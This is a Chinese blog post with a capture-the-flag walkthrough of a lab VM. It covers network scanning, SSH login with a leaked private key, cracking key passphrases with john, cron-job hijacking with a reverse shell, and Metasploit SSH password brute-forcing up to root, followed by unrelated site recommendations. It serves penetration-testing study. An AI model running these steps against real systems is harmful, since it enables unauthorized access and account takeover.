SSH2

最新推荐文章于 2024-05-09 09:53:54 发布
最新推荐文章于 2024-05-09 09:53:54 发布
阅读量278 收藏
点赞数
分类专栏: CTF # CTF夺旗 文章标签: ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mutou990/article/details/107904905
版权

靶机IP:192.168.56.104
攻击机IP:192.168.56.105

一、靶机IP地址发现

netdiscover -r 192.168.56.1/24

二、端口服务扫描

nmap -sV 192.168.56.104
nmap -A -T4 -v 192.168.56.104

三、目录扫描

dirb http://192.168.56.104
nikto -host http://192.168.56.104
对于大端口要特别注意,是HTTP服务的用浏览器http://IP:大端口号访问;非HTTP的用命令查看nc IP 大端口号

四、获得用户权限

1获得第一个用户权限

通过敏感目录发现私钥文件,保存下来后,赋权。然后试着ssh -i id_rsa martin@192.168.56.104 直接回车登录martin用户成功。(这里的私钥文件id_rsa是没有解密密码的 ,所以可以直接使用。如果像【3.CTF-SSH私钥泄露】中的私钥文件是有密码的,则需要如下命令来破解:
locate ssh2john//获得ssh2john位置
python ssh2john位置 > rsacrack//破解后重定向到rsacrack文件
john rsacrack//破解出密码)

2扩大战果

whoami//查看当前用户
id//查看当前用户权限
cd /home//进入家目录
ls //查看有哪些用户,发现除了martin,还有jimmy 和hadi
cd /root//查看根目录 寻找flag文件,如果是root权限,那么表明该靶场被全部拿下。但是如果不是,就肯定要提权,一般情况下,flag文件只属于root用户和对应的用户组。此时发现martin不是root权限,需要进一步提权。

五、提权(root)

提权方式1:利用计划任务
在martin用户下
在这里插入图片描述
cat /etc/crontab//查看martin用户下的定时任务,发现该用户没有定时任务,但是jimmy用户tmp目录下有sekurity.py定时任务,那么我们可以创建同名反弹shell,然后nc 执行监听来获取jimmy用户的权限,进而可以查看jimmy用户是否有root权限。
nc -nlvp 4445//先打开nc监听。netstat -pantu命令可以查看已占用端口。
cd /tmp//进入martin用户缓冲文件目录
touch 1.py//创建临时1.py文件,写反弹shell
vi 1.py//进入编辑模式,按i键进入输入模式,输入以下代码(仔细输入,输错麻烦,ctrl+方向键 进入上下行 编辑完成esc键,再:wq键保存退出
在这里插入图片描述
mv 1.py sekurity.py//重命名成jimmy用户下的sekurity.py。同名覆盖。
chmod +x sekurity.py//赋予可执行权限
等待5分钟(因为jimmy下的定时任务就是5分钟执行),最后获得反弹shell。此时同样执行第二步扩大战果步骤,发现jimmy同样没有root权限。只能暴力破最后一个用户hadi
在这里插入图片描述
本次视频教程里没有用到hydra和medusa工具,而是用metasploit来进行破解,破解钱先使用cupp创建密码字典,下载的cupp放到root 目录下 common-password文件夹内。

msfconsole//启动metasploit的msfconsole模式
use auxiliary/scanner/ssh/ssh_login//使用该payload
show options
set rhosts 192.168.56.103//设置靶机IP
set username hadi
set pass_file /root/common-password/hadi.txt
set verbose true//显示爆破过程
set threads 5//设置线程为5
等待破解完成,非常慢 破解密码为hadi123

back//重新设置
use auxiliary/scanner/ssh/ssh_login//使用该payload
show options
set rhosts 192.168.56.103//设置靶机IP
set username hadi
set password hadi123
run
sessions -i 1//
在这里插入图片描述
python -c “import pty;pty.spawn(’/bin/bash’)”//优化会话窗口
su - root//因为知道hadi用户密码,所以尝试通过su命令进入root
hadi123//输入密码
id
cd /root
ls -alh
cat flag.txt
完成!

cd /tmp//进入缓冲文件目录
ls -alh//查看缓冲文件目录

cat /etc/passwd//查看所有用户的列表
cat /etc/group//查看用户组
find / -user 用户名//查看属于某些用户的文件
/tmp 查看缓冲文件目录

mutou990
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSH2完整版
12-06
采用Struts2+spring2.5+hibernate3.2技术, 数据库:mysql6.0 服务器:tomcat6.0 开发工具:myeclipse8.5 适合广大学者,可做于毕业设计。如果想配置其他数据库,只需将hibernate.cfg.xml配置文件中的配置项换成其他数据库配置即可。
SSH2框架搭建
鹏霄万里展雄飞
01-29 8215
SSH框架,当今最为流行的项目开发框架,那么掌握他的第一步自然是学习如何配置环境,java Web开发的无论哪种框架都离不开各种xml配置,虽然说配置在网上到处都有,但是要成为高手,必须要明白配置中每一部分的意义,分析它的规律,因此走好这第一步至关重要。 SSH分为SSH1和SSH2,区别主要在于Struts的版本,即Struts1和Struts2,Struts1与Struts2在配置上有所差别
探索纯JavaScript实现的SSH2模块:用于Node.js的强大工具
最新发布
gitblog_00065的博客
05-09 629
探索纯JavaScript实现的SSH2模块:用于Node.js的强大工具 项目地址:https://gitcode.com/mscdex/ssh2 在寻找一个高效且可靠的SSH解决方案时,你可能会遇到名为ssh2的纯JavaScript库。这个开源项目为Node.js提供了客户端和服务器端的SSH2模块,旨在提供无缝的远程连接和服务支持。在本文中,我们将深入探讨其功能、应用场景和技术特性,让你了...
SSH2 协议详解
weixin_30550081的博客
05-22 1448
一、SSH介绍   什么是SSH ssh  传统的网络服务程序,如:ftp、pop和telnet在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,别有用心的人非常容易就可以截获这些口令和数据。而且,这些服务程序的安全验证方式也是有其弱点的,就是很容易受到“中间人”(man-in-the-middle)这种方式的攻击。所谓“中间人”的攻击方式,就是“中间人”冒充真正的服务器...
SSH2: Struts2 + Spring + Hibernate 的登录
落羽纷飞
10-11 135
使用分层结构,包括 dao,service,control,web层 Struts2 集成 Spring 需要以下几个步骤 1 加入struts2-spring-plugin-2.0.9.jar到项目中(web项目就是丢到/WEB-INF/lib中) 2 Web.xml文件里加入以下listener [code] org.springframework.web.c...
ssh2
YZQTJGB的博客
06-12 334
application文件<?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:context="http://www.
SSH2框架搭建实例源码
04-25
SSH2框架,全称为Spring、Struts2和Hibernate2的集成框架,是Java Web开发中的一个常见组合。这个实例源码使用的是Spring 3.2、Struts2 2.3.4和Hibernate 4.2这三个框架的较新版本,提供了一个基础的用户登录和用户...
ssh2-1.4.tgz
05-24
ssh2-1.4.tgz
基于Rust的SSH2客户端库设计源码
03-28
这是一个基于Rust语言开发的SSH2客户端库,包含35个文件,其中主要文件类型包括19个Rust源文件、4个YAML文件、3个TOML文件、1个gitignore文件、1个gitmodules文件、1个Apache License文件、1个MIT License文件、1个...
Ssh2Protocol
07-12
**SSH2协议详解** SSH(Secure Shell)是一种网络协议,用于在不安全的网络环境中提供安全的远程登录和其他服务。SSH2SSH协议的第二版,它提供了比SSH1更强大的加密和认证机制,增强了安全性。本文将深入探讨...
ganymed-ssh2-262.jar
09-02
标题中的“ganymed-ssh2-262.jar”是一个特定版本的SSH2库,由Ganymed项目提供,用于Java环境下的SSH(Secure Shell)连接。SSH是一种网络协议,常用于安全地远程登录到服务器、传输文件以及执行命令。Ganymed SSH2...
SSH2整合
03-25
NULL 博文链接:https://xuyuanshuaaa.iteye.com/blog/1144401
ssh2 框架介绍
04-12
ssh2 框架介绍
OpenSSH登录SSH2
10-11
如何确定是OpenSSH还是SSH2? 执行命令“ssh -V”,通过它的输出,即可确定: SSH2 ssh: SSH Secure Shell 3.2.9.1 (non-commercial version) on OpenSSH OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
ssh2实例(用户登陆功能)
08-09
1.确定数据库名 applicationContext-db.xml中配置的是关于数据库的文件。 文件中的数据库名字为ssh2,如果你想修改成为你自己的数据库名,只需将该文件中16行DatabaseName对应的值改下就ok了! 2.执行com.ssh2.utile包下的CreateTable.java类 该类的作用是:通过spring提供的LocalSessionFactoryBean类创建数据库表 3.执行com.ssh2.utile包下的InsertUser.java类 该类的作用是:向数据库中插入一条用户信息,用户名admin 密码123 4.配置服务器并执行,输入上述的用户名及密码,提交跳转到成功页面!
图书管理系统(ssh2
zhongzheng的博客
05-24 1237
项目名称:图书系统               代码行数:5,000+                 工作日:10 Day 关键技术: Java  (ssh2)、MySql、高并发 项目模块:用户管理、角色管理、图书馆、图书分类、图书维护、借书、借书记录、还书 事务流程:拍品被入->拍品入库->入库审核->上拍品->拍品出库(退库) (项目用于学习,若用于他处必究) 项目源码下载:
SSH2要点
nb_lfy的专栏
05-17 960
SSH2要点: Struts2.1.8 要点: 01 struts2及struts2开发环境的搭建 02 第一个struts2应用开发 03 解决struts2配置文件无提示问题 04 Action名称的搜索顺序 05 Action配置的各项默认值 06 result配置的各种视图转发类型 07 为Action属性注入值 08 指定Struts2处理的请求后缀、常量定义、常用常量
安装配置SSH(Secure Shell)
云天碧海
05-25 1217
SSH是一个用来替代TELNET、FTP以及R命令的工具包,主要是想解决口令在网上明文传输的问题。为了系统安全和用户自身的权益,推广SSH是必要的。SSH有两个版本,我们现在介绍的是版本2。   1. 安装SSH 具体步骤如下:   1. 获得SSH软件包。 (ftp://ftp.pku.edu.cn:/pub/unix/ssh-2.3.0.tar.gz)   2. 成为超级用户(root).  
快速入门一 SSH2附带源码
菜鸟的飞翔
02-22 1265
博客地址  http://blog.csdn.net/ftx2540993425 今天元宵节了,又来到学校了,开始新的一年。年前写了一个ssh2的商城项目,现在整理一下,总结一下。 1.1 前台需求分析: 1.1.1 用户模块: 注册: 1.前台JS校验: 2.使用AJAX完成对用户名异步校验: 3.后台Struts2校验: 4.验证码: 5.发送激活邮件: 6
SSH2框架搭建详解与SSH1对比
"SSH框架搭建教程,包括SSH2的版本信息,SSH1与SSH2的比较,SSH2的优势,以及Struts2的特性和所需的jar包配置。" SSH框架是Java Web开发中的一个流行选择,由Struts、Spring和Hibernate三个组件组成,用于构建企业...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值